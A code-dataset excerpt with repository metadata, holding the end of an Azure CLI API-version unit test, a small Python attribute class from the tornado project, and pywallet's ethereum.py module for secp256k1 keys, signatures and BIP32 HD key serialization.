resource_group_name='rg', rcf=rcf)
self.assertEqual(res_utils.api_version, "2005-01-01-preview")
def test_resolve_api_provider_latest_include_preview(self):
# Verifies provider is used as backup if api-version not specified.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, resource_type='Mock/test_latest', resource_name='vnet1',
resource_group_name='rg', rcf=rcf)
self.assertEqual(res_utils.api_version, "2015-01-01")
res_utils = _ResourceUtils(cli, resource_type='Mock/test_latest', resource_name='vnet1',
resource_group_name='rg', rcf=rcf, latest_include_preview=True)
self.assertEqual(res_utils.api_version, "2016-01-01-preview")
def _get_mock_client(self):
client = MagicMock()
provider = MagicMock()
provider.resource_types = [
self._get_mock_resource_type('skip', ['2000-01-01-preview', '2000-01-01']),
self._get_mock_resource_type('test', ['2016-01-01-preview', '2016-01-01']),
self._get_mock_resource_type('foo', ['1999-01-01-preview', '1999-01-01']),
self._get_mock_resource_type('preview', ['2005-01-01-preview', '2004-01-01-preview']),
self._get_mock_resource_type('test_latest', ['2016-01-01-preview', '2015-01-01'])
]
client.providers.get.return_value = provider
return client
def _get_mock_resource_type(self, name, api_versions): # pylint: disable=no-self-use
rt = MagicMock()
rt.resource_type = name
rt.api_versions = api_versions
return rt
if __name__ == '__main__':
unittest.main()
|
dcd1490f66297369bc3ab7b17aa223a8bc789811
|
025401acb1f040d0fffe94b2306e5ed899b773bc
|
/data_structures/attribute.py
|
64fb6c33cca38376671eb4e171186e4535ddf44c
|
[
"MIT"
] |
permissive
|
alipsgh/tornado
|
02f19a838d3136d39d662c4d48403fdb98ce7974
|
f5a2a46a1b0882a91613ab9a635008808a7d37dd
|
refs/heads/master
| 2022-08-07T11:16:17.146885
| 2022-08-02T22:05:11
| 2022-08-02T22:05:11
| 102,551,348
| 129
| 37
|
MIT
| 2022-08-02T22:05:13
| 2017-09-06T02:09:14
|
Python
|
UTF-8
|
Python
| false
| false
| 615
|
py
|
attribute.py
|
class Attribute:
def __init__(self):
self.NAME = None
self.TYPE = None
self.POSSIBLE_VALUES = []
self.MAXIMUM_VALUE = None
self.MINIMUM_VALUE = None
def set_name(self, attr_name):
self.NAME = attr_name
def set_type(self, attr_type):
self.TYPE = attr_type
def set_possible_values(self, attr_possible_values):
self.POSSIBLE_VALUES = attr_possible_values
def set_bounds_values(self, attr_min_value, attr_max_value):
self.MINIMUM_VALUE = attr_min_value
self.MAXIMUM_VALUE = attr_max_value
|
fd132cd2443af5b9a66775b0e1854482f86045e6
|
2c9a0463dcd7c88623bedf94dbfa3b33f2830783
|
/pywallet/utils/ethereum.py
|
2541052ddd5915aebf600084217935f69b7fc178
|
[
"MIT"
] |
permissive
|
ranaroussi/pywallet
|
dea3a23b5f9c2631120811eb307582b512883d94
|
468622dcf993a27a5b585289b2724986c02a1fbc
|
refs/heads/master
| 2023-04-11T05:48:46.160948
| 2019-11-09T14:32:13
| 2019-11-09T14:32:13
| 111,648,229
| 432
| 199
|
MIT
| 2023-03-16T08:54:02
| 2017-11-22T07:02:29
|
Python
|
UTF-8
|
Python
| false
| false
| 55,603
|
py
|
ethereum.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Code from:
https://github.com/michailbrynard/ethereum-bip44-python
This submodule provides the PublicKey, PrivateKey, and Signature classes.
It also provides HDPublicKey and HDPrivateKey classes for working with HD
wallets."""
import math
import base58
import base64
import binascii
import hashlib
import hmac
from mnemonic.mnemonic import Mnemonic
import random
from two1.bitcoin.utils import bytes_to_str
from two1.bitcoin.utils import address_to_key_hash
from two1.bitcoin.utils import rand_bytes
from two1.crypto.ecdsa_base import Point
from two1.crypto.ecdsa import ECPointAffine
from two1.crypto.ecdsa import secp256k1
bitcoin_curve = secp256k1()
from Crypto.Hash import keccak
sha3_256 = lambda x: keccak.new(digest_bits=256, data=x)
def sha3(seed):
return sha3_256(seed).digest()
def get_bytes(s):
"""Returns the byte representation of a hex- or byte-string."""
if isinstance(s, bytes):
b = s
elif isinstance(s, str):
b = bytes.fromhex(s)
else:
raise TypeError("s must be either 'bytes' or 'str'!")
return b
class PrivateKeyBase(object):
""" Base class for both PrivateKey and HDPrivateKey.
As this class is a base class it should not be used directly.
Args:
k (int): The private key.
Returns:
PrivateKey: The object representing the private key.
"""
@staticmethod
def from_b58check(private_key):
""" Decodes a Base58Check encoded private-key.
Args:
private_key (str): A Base58Check encoded private key.
Returns:
PrivateKey: A PrivateKey object
"""
raise NotImplementedError
def __init__(self, k):
self.key = k
self._public_key = None
@property
def public_key(self):
""" Returns the public key associated with this private key.
Returns:
PublicKey:
The PublicKey object that corresponds to this
private key.
"""
return self._public_key
def raw_sign(self, message, do_hash=True):
""" Signs message using this private key.
Args:
message (bytes): The message to be signed. If a string is
provided it is assumed the encoding is 'ascii' and
converted to bytes. If this is not the case, it is up
to the caller to convert the string to bytes
appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
ECPointAffine:
a raw point (r = pt.x, s = pt.y) which is
the signature.
"""
raise NotImplementedError
def sign(self, message, do_hash=True):
""" Signs message using this private key.
Note:
This differs from `raw_sign()` since it returns a
Signature object.
Args:
message (bytes or str): The message to be signed. If a
string is provided it is assumed the encoding is
'ascii' and converted to bytes. If this is not the
case, it is up to the caller to convert the string to
bytes appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
Signature: The signature corresponding to message.
"""
raise NotImplementedError
def sign_bitcoin(self, message, compressed=False):
""" Signs a message using this private key such that it
is compatible with bitcoind, bx, and other Bitcoin
clients/nodes/utilities.
Note:
0x18 + b\"Bitcoin Signed Message:" + newline + len(message) is
prepended to the message before signing.
Args:
message (bytes or str): Message to be signed.
compressed (bool): True if the corresponding public key will be
used in compressed format. False if the uncompressed version
is used.
Returns:
bytes: A Base64-encoded byte string of the signed message.
The first byte of the encoded message contains information
about how to recover the public key. In bitcoind parlance,
this is the magic number containing the recovery ID and
whether or not the key was compressed or not. (This function
always processes full, uncompressed public-keys, so the magic
number will always be either 27 or 28).
"""
raise NotImplementedError
def to_b58check(self, testnet=False):
""" Generates a Base58Check encoding of this private key.
Returns:
str: A Base58Check encoded string representing the key.
"""
raise NotImplementedError
def to_hex(self):
""" Generates a hex encoding of the serialized key.
Returns:
str: A hex encoded string representing the key.
"""
return bytes_to_str(bytes(self))
def __bytes__(self):
raise NotImplementedError
def __int__(self):
raise NotImplementedError
class PublicKeyBase(object):
""" Base class for both PublicKey and HDPublicKey.
As this class is a base class it should not be used directly.
Args:
x (int): The x component of the public key point.
y (int): The y component of the public key point.
Returns:
PublicKey: The object representing the public key.
"""
@staticmethod
def from_bytes(key_bytes):
""" Generates a public key object from a byte (or hex) string.
Args:
key_bytes (bytes or str): A byte stream.
Returns:
PublicKey: A PublicKey object.
"""
raise NotImplementedError
@staticmethod
def from_private_key(private_key):
""" Generates a public key object from a PrivateKey object.
Args:
private_key (PrivateKey): The private key object from
which to derive this object.
Returns:
PublicKey: A PublicKey object.
"""
return private_key.public_key
def __init__(self):
pass
def hash160(self, compressed=True):
""" Return the RIPEMD-160 hash of the SHA-256 hash of the
public key.
Args:
compressed (bool): Whether or not the compressed key should
be used.
Returns:
bytes: RIPEMD-160 byte string.
"""
raise NotImplementedError
def address(self, compressed=True, testnet=False):
""" Address property that returns the Base58Check
encoded version of the HASH160.
Args:
compressed (bool): Whether or not the compressed key should
be used.
testnet (bool): Whether or not the key is intended for testnet
usage. False indicates mainnet usage.
Returns:
bytes: Base58Check encoded string
"""
raise NotImplementedError
def verify(self, message, signature, do_hash=True):
""" Verifies that message was appropriately signed.
Args:
message (bytes): The message to be verified.
signature (Signature): A signature object.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
verified (bool): True if the signature is verified, False
otherwise.
"""
raise NotImplementedError
def to_hex(self):
""" Hex representation of the serialized byte stream.
Returns:
h (str): A hex-encoded string.
"""
return bytes_to_str(bytes(self))
def __bytes__(self):
raise NotImplementedError
def __int__(self):
raise NotImplementedError
@property
def compressed_bytes(self):
""" Byte string corresponding to a compressed representation
of this public key.
Returns:
b (bytes): A 33-byte long byte string.
"""
raise NotImplementedError
class PrivateKey(PrivateKeyBase):
""" Encapsulation of a Bitcoin ECDSA private key.
This class provides capability to generate private keys,
obtain the corresponding public key, sign messages and
serialize/deserialize into a variety of formats.
Args:
k (int): The private key.
Returns:
PrivateKey: The object representing the private key.
"""
TESTNET_VERSION = 0xEF
MAINNET_VERSION = 0x80
@staticmethod
def from_bytes(b):
""" Generates PrivateKey from the underlying bytes.
Args:
b (bytes): A byte stream containing a 256-bit (32-byte) integer.
Returns:
tuple(PrivateKey, bytes): A PrivateKey object and the remainder
of the bytes.
"""
if len(b) < 32:
raise ValueError('b must contain at least 32 bytes')
return PrivateKey(int.from_bytes(b[:32], 'big'))
@staticmethod
def from_hex(h):
""" Generates PrivateKey from a hex-encoded string.
Args:
h (str): A hex-encoded string containing a 256-bit
(32-byte) integer.
Returns:
PrivateKey: A PrivateKey object.
"""
return PrivateKey.from_bytes(bytes.fromhex(h))
@staticmethod
def from_int(i):
""" Initializes a private key from an integer.
Args:
i (int): Integer that is the private key.
Returns:
PrivateKey: The object representing the private key.
"""
return PrivateKey(i)
@staticmethod
def from_b58check(private_key):
""" Decodes a Base58Check encoded private-key.
Args:
private_key (str): A Base58Check encoded private key.
Returns:
PrivateKey: A PrivateKey object
"""
b58dec = base58.b58decode_check(private_key)
version = b58dec[0]
assert version in [PrivateKey.TESTNET_VERSION,
PrivateKey.MAINNET_VERSION]
return PrivateKey(int.from_bytes(b58dec[1:], 'big'))
@staticmethod
def from_random():
""" Initializes a private key from a random integer.
Returns:
PrivateKey: The object representing the private key.
"""
return PrivateKey(random.SystemRandom().randrange(1, bitcoin_curve.n))
def __init__(self, k):
self.key = k
self._public_key = None
@property
def public_key(self):
""" Returns the public key associated with this private key.
Returns:
PublicKey:
The PublicKey object that corresponds to this
private key.
"""
if self._public_key is None:
self._public_key = PublicKey.from_point(
bitcoin_curve.public_key(self.key))
return self._public_key
def raw_sign(self, message, do_hash=True):
""" Signs message using this private key.
Args:
message (bytes): The message to be signed. If a string is
provided it is assumed the encoding is 'ascii' and
converted to bytes. If this is not the case, it is up
to the caller to convert the string to bytes
appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
ECPointAffine:
a raw point (r = pt.x, s = pt.y) which is
the signature.
"""
if isinstance(message, str):
msg = bytes(message, 'ascii')
elif isinstance(message, bytes):
msg = message
else:
raise TypeError("message must be either str or bytes!")
sig_pt, rec_id = bitcoin_curve.sign(msg, self.key, do_hash)
# Take care of large s:
# Bitcoin deals with large s, by subtracting
# s from the curve order. See:
# https://bitcointalk.org/index.php?topic=285142.30;wap2
if sig_pt.y >= (bitcoin_curve.n // 2):
sig_pt = Point(sig_pt.x, bitcoin_curve.n - sig_pt.y)
rec_id ^= 0x1
return (sig_pt, rec_id)
def sign(self, message, do_hash=True):
""" Signs message using this private key.
Note:
This differs from `raw_sign()` since it returns a Signature object.
Args:
message (bytes or str): The message to be signed. If a
string is provided it is assumed the encoding is
'ascii' and converted to bytes. If this is not the
case, it is up to the caller to convert the string to
bytes appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
Signature: The signature corresponding to message.
"""
# Some BTC things want to have the recovery id to extract the public
# key, so we should figure that out.
sig_pt, rec_id = self.raw_sign(message, do_hash)
return Signature(sig_pt.x, sig_pt.y, rec_id)
def sign_bitcoin(self, message, compressed=False):
""" Signs a message using this private key such that it
is compatible with bitcoind, bx, and other Bitcoin
clients/nodes/utilities.
Note:
0x18 + b\"Bitcoin Signed Message:" + newline + len(message) is
prepended to the message before signing.
Args:
message (bytes or str): Message to be signed.
compressed (bool): True if the corresponding public key will be
used in compressed format. False if the uncompressed version
is used.
Returns:
bytes: A Base64-encoded byte string of the signed message.
The first byte of the encoded message contains information
about how to recover the public key. In bitcoind parlance,
this is the magic number containing the recovery ID and
whether or not the key was compressed or not.
"""
if isinstance(message, str):
msg_in = bytes(message, 'ascii')
elif isinstance(message, bytes):
msg_in = message
else:
raise TypeError("message must be either str or bytes!")
msg = b"\x18Bitcoin Signed Message:\n" + bytes([len(msg_in)]) + msg_in
msg_hash = hashlib.sha256(msg).digest()
sig = self.sign(msg_hash)
comp_adder = 4 if compressed else 0
magic = 27 + sig.recovery_id + comp_adder
return base64.b64encode(bytes([magic]) + bytes(sig))
def to_b58check(self, testnet=False):
""" Generates a Base58Check encoding of this private key.
Returns:
str: A Base58Check encoded string representing the key.
"""
version = self.TESTNET_VERSION if testnet else self.MAINNET_VERSION
return base58.b58encode_check(bytes([version]) + bytes(self))
def __bytes__(self):
return self.key.to_bytes(32, 'big')
def __int__(self):
return self.key
class PublicKey(PublicKeyBase):
""" Encapsulation of a Bitcoin ECDSA public key.
This class provides a high-level API to using an ECDSA public
key, specifically for Bitcoin (secp256k1) purposes.
Args:
x (int): The x component of the public key point.
y (int): The y component of the public key point.
Returns:
PublicKey: The object representing the public key.
"""
TESTNET_VERSION = 0x6F
MAINNET_VERSION = 0x00
@staticmethod
def from_point(p):
""" Generates a public key object from any object
containing x, y coordinates.
Args:
p (Point): An object containing a two-dimensional, affine
representation of a point on the secp256k1 curve.
Returns:
PublicKey: A PublicKey object.
"""
return PublicKey(p.x, p.y)
@staticmethod
def from_int(i):
""" Generates a public key object from an integer.
Note:
This assumes that the upper 32 bytes of the integer
are the x component of the public key point and the
lower 32 bytes are the y component.
Args:
i (Bignum): A 512-bit integer representing the public
key point on the secp256k1 curve.
Returns:
PublicKey: A PublicKey object.
"""
point = ECPointAffine.from_int(bitcoin_curve, i)
return PublicKey.from_point(point)
@staticmethod
def from_base64(b64str, testnet=False):
""" Generates a public key object from a Base64 encoded string.
Args:
b64str (str): A Base64-encoded string.
testnet (bool) (Optional): If True, changes the version that
is prepended to the key.
Returns:
PublicKey: A PublicKey object.
"""
return PublicKey.from_bytes(base64.b64decode(b64str))
@staticmethod
def from_bytes(key_bytes):
""" Generates a public key object from a byte (or hex) string.
The byte stream must be of the SEC variety
(http://www.secg.org/): beginning with a single byte telling
what key representation follows. A full, uncompressed key
is represented by: 0x04 followed by 64 bytes containing
the x and y components of the point. For compressed keys
with an even y component, 0x02 is followed by 32 bytes
containing the x component. For compressed keys with an
odd y component, 0x03 is followed by 32 bytes containing
the x component.
Args:
key_bytes (bytes or str): A byte stream that conforms to the above.
Returns:
PublicKey: A PublicKey object.
"""
b = get_bytes(key_bytes)
key_bytes_len = len(b)
key_type = b[0]
if key_type == 0x04:
# Uncompressed
if key_bytes_len != 65:
raise ValueError("key_bytes must be exactly 65 bytes long when uncompressed.")
x = int.from_bytes(b[1:33], 'big')
y = int.from_bytes(b[33:65], 'big')
elif key_type == 0x02 or key_type == 0x03:
if key_bytes_len != 33:
raise ValueError("key_bytes must be exactly 33 bytes long when compressed.")
x = int.from_bytes(b[1:33], 'big')
ys = bitcoin_curve.y_from_x(x)
# Pick the one that corresponds to key_type
last_bit = key_type - 0x2
for y in ys:
if y & 0x1 == last_bit:
break
else:
return None
return PublicKey(x, y)
@staticmethod
def from_hex(h):
""" Generates a public key object from a hex-encoded string.
See from_bytes() for requirements of the hex string.
Args:
h (str): A hex-encoded string.
Returns:
PublicKey: A PublicKey object.
"""
return PublicKey.from_bytes(h)
@staticmethod
def from_signature(message, signature):
""" Attempts to create PublicKey object by deriving it
from the message and signature.
Args:
message (bytes): The message to be verified.
signature (Signature): The signature for message.
The recovery_id must not be None!
Returns:
PublicKey:
A PublicKey object derived from the
signature, it it exists. None otherwise.
"""
if signature.recovery_id is None:
raise ValueError("The signature must have a recovery_id.")
msg = get_bytes(message)
pub_keys = bitcoin_curve.recover_public_key(msg,
signature,
signature.recovery_id)
for k, recid in pub_keys:
if signature.recovery_id is not None and recid == signature.recovery_id:
return PublicKey(k.x, k.y)
return None
@staticmethod
def verify_bitcoin(message, signature, address):
""" Verifies a message signed using PrivateKey.sign_bitcoin()
or any of the bitcoin utils (e.g. bitcoin-cli, bx, etc.)
Args:
message(bytes): The message that the signature corresponds to.
signature (bytes or str): A Base64 encoded signature
address (str): Base58Check encoded address.
Returns:
bool: True if the signature verified properly, False otherwise.
"""
magic_sig = base64.b64decode(signature)
magic = magic_sig[0]
sig = Signature.from_bytes(magic_sig[1:])
sig.recovery_id = (magic - 27) & 0x3
compressed = ((magic - 27) & 0x4) != 0
# Build the message that was signed
msg = b"\x18Bitcoin Signed Message:\n" + bytes([len(message)]) + message
msg_hash = hashlib.sha256(msg).digest()
derived_public_key = PublicKey.from_signature(msg_hash, sig)
if derived_public_key is None:
raise ValueError("Could not recover public key from the provided signature.")
ver, h160 = address_to_key_hash(address)
hash160 = derived_public_key.hash160(compressed)
if hash160 != h160:
return False
return derived_public_key.verify(msg_hash, sig)
def __init__(self, x, y):
p = ECPointAffine(bitcoin_curve, x, y)
if not bitcoin_curve.is_on_curve(p):
raise ValueError("The provided (x, y) are not on the secp256k1 curve.")
self.point = p
# RIPEMD-160 of SHA-256
r = hashlib.new('ripemd160')
r.update(hashlib.sha256(bytes(self)).digest())
self.ripe = r.digest()
r = hashlib.new('ripemd160')
r.update(hashlib.sha256(self.compressed_bytes).digest())
self.ripe_compressed = r.digest()
self.keccak = sha3(bytes(self)[1:])
def hash160(self, compressed=True):
""" Return the RIPEMD-160 hash of the SHA-256 hash of the
public key.
Args:
compressed (bool): Whether or not the compressed key should
be used.
Returns:
bytes: RIPEMD-160 byte string.
"""
return self.ripe_compressed if compressed else self.ripe
def address(self, compressed=True, testnet=False):
""" Address property that returns the Base58Check
encoded version of the HASH160.
Args:
compressed (bool): Whether or not the compressed key should
be used.
testnet (bool): Whether or not the key is intended for testnet
usage. False indicates mainnet usage.
Returns:
bytes: Base58Check encoded string
"""
version = '0x'
return version + binascii.hexlify(self.keccak[12:]).decode('ascii')
# Put the version byte in front, 0x00 for Mainnet, 0x6F for testnet
# version = bytes([self.TESTNET_VERSION]) if testnet else bytes([self.MAINNET_VERSION])
# return base58.b58encode_check(version + self.hash160(compressed))
def verify(self, message, signature, do_hash=True):
""" Verifies that message was appropriately signed.
Args:
message (bytes): The message to be verified.
signature (Signature): A signature object.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
verified (bool): True if the signature is verified, False
otherwise.
"""
msg = get_bytes(message)
return bitcoin_curve.verify(msg, signature, self.point, do_hash)
def to_base64(self):
""" Hex representation of the serialized byte stream.
Returns:
b (str): A Base64-encoded string.
"""
return base64.b64encode(bytes(self))
def __int__(self):
mask = 2 ** 256 - 1
return ((self.point.x & mask) << bitcoin_curve.nlen) | (self.point.y & mask)
def __bytes__(self):
return bytes(self.point)
@property
def compressed_bytes(self):
""" Byte string corresponding to a compressed representation
of this public key.
Returns:
b (bytes): A 33-byte long byte string.
"""
return self.point.compressed_bytes
class Signature(object):
""" Encapsulation of a ECDSA signature for Bitcoin purposes.
Args:
r (Bignum): r component of the signature.
s (Bignum): s component of the signature.
recovery_id (int) (Optional): Must be between 0 and 3 specifying
which of the public keys generated by the algorithm specified
in http://www.secg.org/sec1-v2.pdf Section 4.1.6 (Public Key
Recovery Operation) is the correct one for this signature.
Returns:
sig (Signature): A Signature object.
"""
@staticmethod
def from_der(der):
""" Decodes a Signature that was DER-encoded.
Args:
der (bytes or str): The DER encoding to be decoded.
Returns:
Signature: The deserialized signature.
"""
d = get_bytes(der)
# d must conform to (from btcd):
# [0 ] 0x30 - ASN.1 identifier for sequence
# [1 ] <1-byte> - total remaining length
# [2 ] 0x02 - ASN.1 identifier to specify an integer follows
# [3 ] <1-byte> - length of R
# [4.] <bytes> - R
# [..] 0x02 - ASN.1 identifier to specify an integer follows
# [..] <1-byte> - length of S
# [..] <bytes> - S
# 6 bytes + R (min. 1 byte) + S (min. 1 byte)
if len(d) < 8:
raise ValueError("DER signature string is too short.")
# 6 bytes + R (max. 33 bytes) + S (max. 33 bytes)
if len(d) > 72:
raise ValueError("DER signature string is too long.")
if d[0] != 0x30:
raise ValueError("DER signature does not start with 0x30.")
if d[1] != len(d[2:]):
raise ValueError("DER signature length incorrect.")
total_length = d[1]
if d[2] != 0x02:
raise ValueError("DER signature no 1st int marker.")
if d[3] <= 0 or d[3] > (total_length - 7):
raise ValueError("DER signature incorrect R length.")
# Grab R, check for errors
rlen = d[3]
s_magic_index = 4 + rlen
rb = d[4:s_magic_index]
if rb[0] & 0x80 != 0:
raise ValueError("DER signature R is negative.")
if len(rb) > 1 and rb[0] == 0 and rb[1] & 0x80 != 0x80:
raise ValueError("DER signature R is excessively padded.")
r = int.from_bytes(rb, 'big')
# Grab S, check for errors
if d[s_magic_index] != 0x02:
raise ValueError("DER signature no 2nd int marker.")
slen_index = s_magic_index + 1
slen = d[slen_index]
if slen <= 0 or slen > len(d) - (slen_index + 1):
raise ValueError("DER signature incorrect S length.")
sb = d[slen_index + 1:]
if sb[0] & 0x80 != 0:
raise ValueError("DER signature S is negative.")
if len(sb) > 1 and sb[0] == 0 and sb[1] & 0x80 != 0x80:
raise ValueError("DER signature S is excessively padded.")
s = int.from_bytes(sb, 'big')
if r < 1 or r >= bitcoin_curve.n:
raise ValueError("DER signature R is not between 1 and N - 1.")
if s < 1 or s >= bitcoin_curve.n:
raise ValueError("DER signature S is not between 1 and N - 1.")
return Signature(r, s)
@staticmethod
def from_base64(b64str):
""" Generates a signature object from a Base64 encoded string.
Args:
b64str (str): A Base64-encoded string.
Returns:
Signature: A Signature object.
"""
return Signature.from_bytes(base64.b64decode(b64str))
@staticmethod
def from_bytes(b):
""" Extracts the r and s components from a byte string.
Args:
b (bytes): A 64-byte long string. The first 32 bytes are
extracted as the r component and the second 32 bytes
are extracted as the s component.
Returns:
Signature: A Signature object.
Raises:
ValueError: If signature is incorrect length
"""
if len(b) != 64:
raise ValueError("from_bytes: Signature length != 64.")
r = int.from_bytes(b[0:32], 'big')
s = int.from_bytes(b[32:64], 'big')
return Signature(r, s)
@staticmethod
def from_hex(h):
""" Extracts the r and s components from a hex-encoded string.
Args:
h (str): A 64-byte (128 character) long string. The first
32 bytes are extracted as the r component and the
second 32 bytes are extracted as the s component.
Returns:
Signature: A Signature object.
"""
return Signature.from_bytes(bytes.fromhex(h))
def __init__(self, r, s, recovery_id=None):
self.r = r
self.s = s
self.recovery_id = recovery_id
@property
def x(self):
""" Convenience property for any method that requires
this object to provide a Point interface.
"""
return self.r
@property
def y(self):
""" Convenience property for any method that requires
this object to provide a Point interface.
"""
return self.s
def _canonicalize(self):
rv = []
for x in [self.r, self.s]:
# Compute minimum bytes to represent integer
bl = math.ceil(x.bit_length() / 8)
# Make sure it's at least one byte in length
if bl == 0:
bl += 1
x_bytes = x.to_bytes(bl, 'big')
# make sure there's no way it could be interpreted
# as a negative integer
if x_bytes[0] & 0x80:
x_bytes = bytes([0]) + x_bytes
rv.append(x_bytes)
return rv
def to_der(self):
""" Encodes this signature using DER
Returns:
bytes: The DER encoding of (self.r, self.s).
"""
# Output should be:
# 0x30 <length> 0x02 <length r> r 0x02 <length s> s
r, s = self._canonicalize()
total_length = 6 + len(r) + len(s)
der = bytes([0x30, total_length - 2, 0x02, len(r)]) + r + bytes([0x02, len(s)]) + s
return der
def to_hex(self):
""" Hex representation of the serialized byte stream.
Returns:
str: A hex-encoded string.
"""
return bytes_to_str(bytes(self))
def to_base64(self):
""" Hex representation of the serialized byte stream.
Returns:
str: A Base64-encoded string.
"""
return base64.b64encode(bytes(self))
def __bytes__(self):
nbytes = math.ceil(bitcoin_curve.nlen / 8)
return self.r.to_bytes(nbytes, 'big') + self.s.to_bytes(nbytes, 'big')
class HDKey(object):
""" Base class for HDPrivateKey and HDPublicKey.
Args:
key (PrivateKey or PublicKey): The underlying simple private or
public key that is used to sign/verify.
chain_code (bytes): The chain code associated with the HD key.
depth (int): How many levels below the master node this key is. By
definition, depth = 0 for the master node.
index (int): A value between 0 and 0xffffffff indicating the child
number. Values >= 0x80000000 are considered hardened children.
parent_fingerprint (bytes): The fingerprint of the parent node. This
is 0x00000000 for the master node.
Returns:
HDKey: An HDKey object.
"""
@staticmethod
def from_b58check(key):
""" Decodes a Base58Check encoded key.
The encoding must conform to the description in:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#serialization-format
Args:
key (str): A Base58Check encoded key.
Returns:
HDPrivateKey or HDPublicKey:
Either an HD private or
public key object, depending on what was serialized.
"""
return HDKey.from_bytes(base58.b58decode_check(key))
@staticmethod
def from_bytes(b):
""" Generates either a HDPrivateKey or HDPublicKey from the underlying
bytes.
The serialization must conform to the description in:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#serialization-format
Args:
b (bytes): A byte stream conforming to the above.
Returns:
HDPrivateKey or HDPublicKey:
Either an HD private or
public key object, depending on what was serialized.
"""
if len(b) < 78:
raise ValueError("b must be at least 78 bytes long.")
version = int.from_bytes(b[:4], 'big')
depth = b[4]
parent_fingerprint = b[5:9]
index = int.from_bytes(b[9:13], 'big')
chain_code = b[13:45]
key_bytes = b[45:78]
rv = None
if version == HDPrivateKey.MAINNET_VERSION or version == HDPrivateKey.TESTNET_VERSION:
if key_bytes[0] != 0:
raise ValueError("First byte of private key must be 0x00!")
private_key = int.from_bytes(key_bytes[1:], 'big')
rv = HDPrivateKey(key=private_key,
chain_code=chain_code,
index=index,
depth=depth,
parent_fingerprint=parent_fingerprint)
elif version == HDPublicKey.MAINNET_VERSION or version == HDPublicKey.TESTNET_VERSION:
if key_bytes[0] != 0x02 and key_bytes[0] != 0x03:
raise ValueError("First byte of public key must be 0x02 or 0x03!")
public_key = PublicKey.from_bytes(key_bytes)
rv = HDPublicKey(x=public_key.point.x,
y=public_key.point.y,
chain_code=chain_code,
index=index,
depth=depth,
parent_fingerprint=parent_fingerprint)
else:
raise ValueError("incorrect encoding.")
return rv
@staticmethod
def from_hex(h):
""" Generates either a HDPrivateKey or HDPublicKey from the underlying
hex-encoded string.
The serialization must conform to the description in:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#serialization-format
Args:
h (str): A hex-encoded string conforming to the above.
Returns:
HDPrivateKey or HDPublicKey:
Either an HD private or
public key object, depending on what was serialized.
"""
return HDKey.from_bytes(bytes.fromhex(h))
@staticmethod
def from_path(root_key, path):
p = HDKey.parse_path(path)
if p[0] == "m":
if root_key.master:
p = p[1:]
else:
raise ValueError("root_key must be a master key if 'm' is the first element of the path.")
keys = [root_key]
for i in p:
if isinstance(i, str):
hardened = i[-1] == "'"
index = int(i[:-1], 0) | 0x80000000 if hardened else int(i, 0)
else:
index = i
k = keys[-1]
klass = k.__class__
keys.append(klass.from_parent(k, index))
return keys
@staticmethod
def parse_path(path):
if isinstance(path, str):
# Remove trailing "/"
p = path.rstrip("/").split("/")
elif isinstance(path, bytes):
p = path.decode('utf-8').rstrip("/").split("/")
else:
p = list(path)
return p
@staticmethod
def path_from_indices(l):
p = []
for n in l:
if n == "m":
p.append(n)
else:
if n & 0x80000000:
_n = n & 0x7fffffff
p.append(str(_n) + "'")
else:
p.append(str(n))
return "/".join(p)
def __init__(self, key, chain_code, index, depth, parent_fingerprint):
if index < 0 or index > 0xffffffff:
raise ValueError("index is out of range: 0 <= index <= 2**32 - 1")
if not isinstance(chain_code, bytes):
raise TypeError("chain_code must be bytes")
self._key = key
self.chain_code = chain_code
self.depth = depth
self.index = index
self.parent_fingerprint = get_bytes(parent_fingerprint)
@property
def master(self):
""" Whether or not this is a master node.
Returns:
bool: True if this is a master node, False otherwise.
"""
return self.depth == 0
@property
def hardened(self):
""" Whether or not this is a hardened node.
Hardened nodes are those with indices >= 0x80000000.
Returns:
bool: True if this is hardened, False otherwise.
"""
# A hardened key is a key with index >= 2 ** 31, so
# we check that the MSB of a uint32 is set.
return self.index & 0x80000000
@property
def identifier(self):
""" Returns the identifier for the key.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
Returns:
bytes: A 20-byte RIPEMD-160 hash.
"""
raise NotImplementedError
@property
def fingerprint(self):
""" Returns the key's fingerprint, which is the first 4 bytes
of its identifier.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
Returns:
bytes: The first 4 bytes of the RIPEMD-160 hash.
"""
return self.identifier[:4]
def to_b58check(self, testnet=False):
""" Generates a Base58Check encoding of this key.
Args:
testnet (bool): True if the key is to be used with
testnet, False otherwise.
Returns:
str: A Base58Check encoded string representing the key.
"""
b = self.testnet_bytes if testnet else bytes(self)
return base58.b58encode_check(b)
def _serialize(self, testnet=False):
version = self.TESTNET_VERSION if testnet else self.MAINNET_VERSION
key_bytes = self._key.compressed_bytes if isinstance(self, HDPublicKey) else b'\x00' + bytes(self._key)
return (version.to_bytes(length=4, byteorder='big') +
bytes([self.depth]) +
self.parent_fingerprint +
self.index.to_bytes(length=4, byteorder='big') +
self.chain_code +
key_bytes)
def __bytes__(self):
return self._serialize()
@property
def testnet_bytes(self):
""" Serialization of the key for testnet.
Returns:
bytes:
A 78-byte serialization of the key, specifically for
testnet (i.e. the first 2 bytes will be 0x0435).
"""
return self._serialize(True)
